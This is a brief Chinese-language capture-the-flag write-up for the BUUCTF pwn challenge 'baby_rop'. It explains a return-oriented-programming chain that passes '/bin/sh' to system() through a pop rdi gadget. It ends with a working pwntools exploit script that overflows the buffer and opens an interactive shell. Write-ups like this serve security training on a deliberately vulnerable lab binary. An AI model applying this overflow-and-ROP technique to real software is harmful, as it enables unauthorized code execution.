0x01 文件分析 ![BUUCTF pwn [HarekazeCTF2019]baby_rop](https://img.it610.com/image/info8/fa753348e87247a49cc50a77eaf43b51.jpg)
文章图片
?
0x02 运行 【BUUCTF pwn [HarekazeCTF2019]baby_rop】![BUUCTF pwn [HarekazeCTF2019]baby_rop](https://img.it610.com/image/info8/791af36d7552433c9163920ce15e8e78.jpg)
文章图片
?一组回显
?
0x03 IDA ![BUUCTF pwn [HarekazeCTF2019]baby_rop](https://img.it610.com/image/info8/fe6fe1ef51154c68ac51d36a9699ebc4.png)
文章图片
![BUUCTF pwn [HarekazeCTF2019]baby_rop](https://img.it610.com/image/info8/f05991ef2f6048078dd338245027cfaf.png)
文章图片
?程序之中存在system函数,通过搜索字符串,还能得到’/bin/sh’字符串,一个简单的rop。
?
0x04 思路 ?简单rop,利用万能的gadget,pop rdi ret传入字符串并调用system,得到shell。此题flag的位置在/home/babyrop内,可以通过find -name flag查找位置。
?
0x05 exp
from pwn import *p = process("./babyrop")
#p = remote('node3.buuoj.cn', 27401)sys_addr = 0x0000000000400490
bin_sh = 0x0000000000601048
pop_rdi = 0x0000000000400683p.recvuntil('? ')
p.sendline('a'*0x18+p64(pop_rdi)+p64(bin_sh)+p64(sys_addr))p.interactive()
一个简单的网络安全公众号,欢迎各位朋友们关注!
![BUUCTF pwn [HarekazeCTF2019]baby_rop](https://img.it610.com/image/info8/90b247ac730a45739ef286e5723fc1c7.jpg)
文章图片
